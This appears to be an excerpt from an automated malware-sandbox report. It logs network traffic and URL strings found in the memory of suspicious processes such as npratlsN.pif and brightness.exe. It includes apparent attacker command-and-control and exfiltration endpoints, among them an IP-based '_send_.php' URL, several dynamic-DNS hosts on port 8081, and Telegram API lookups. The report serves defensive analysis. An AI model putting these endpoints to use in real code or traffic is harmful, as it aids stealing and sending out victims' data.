Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: amazonenviro.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.irco.com.sa

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 16 Jan 2025 07:25:48 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 16 Jan 2025 07:26:02 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 16 Jan 2025 07:26:09 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: npratlsN.pif, 0000000D.00000002.3852283482.000000001CC7A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9F5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.000000002853D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: npratlsN.pif, 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: npratlsN.pif, 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CB71000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D8E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028401000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: npratlsN.pif, 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CB71000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D8E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028401000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: npratlsN.pif, 00000011.00000002.3850452895.0000000028401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: npratlsN.pif, 0000000D.00000002.3861251600.000000001F140000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CB71000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D8E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: npratlsN.pif, 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: brightness.exe, 00000007.00000003.2241546337.0000000021D71000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2277009105.0000000021800000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2242163340.000000007F43A000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.0000000020460000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2216601555.000000007F62F000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000204F0000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif.7.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: npratlsN.pif, 0000000D.00000003.2812427114.000000001F1D9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3861251600.000000001F140000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC7A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC96000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2928519346.00000000307A8000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9F5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3865103101.0000000030778000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3847403141.000000002B8B2000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DA1F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998497674.00000000267E7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998598056.000000002B3B5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998676188.000000002B3D0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998497674.00000000267A9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.000000002853D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3862857425.000000002B3B5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3847686800.0000000026796000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028565000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3847686800.00000000267E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://e6.i.lencr.org/0
Source: npratlsN.pif, 0000000D.00000003.2812427114.000000001F1D9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3861251600.000000001F140000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC7A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC96000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2928519346.00000000307A8000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9F5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3865103101.0000000030778000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3847403141.000000002B8B2000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DA1F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998497674.00000000267E7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998598056.000000002B3B5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998676188.000000002B3D0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998497674.00000000267A9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.000000002853D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3862857425.000000002B3B5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3847686800.0000000026796000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028565000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3847686800.00000000267E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://e6.o.lencr.org0
Source: npratlsN.pif, 0000000D.00000002.3852283482.000000001CC7A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC96000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9F5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DA1F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.000000002853D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.irco.com.sa
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: brightness.exe, 00000007.00000003.2241546337.0000000021D71000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2277009105.0000000021800000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2242163340.000000007F43A000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.0000000020460000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2216601555.000000007F62F000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000204F0000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 00000010.00000002.2482451684.0000000020595000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif.7.dr	String found in binary or memory: http://ocsp.comodoca.com0$
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: npratlsN.pif, 0000000D.00000002.3852283482.000000001CB71000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D8E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: npratlsN.pif, 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CB71000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D8E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028401000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
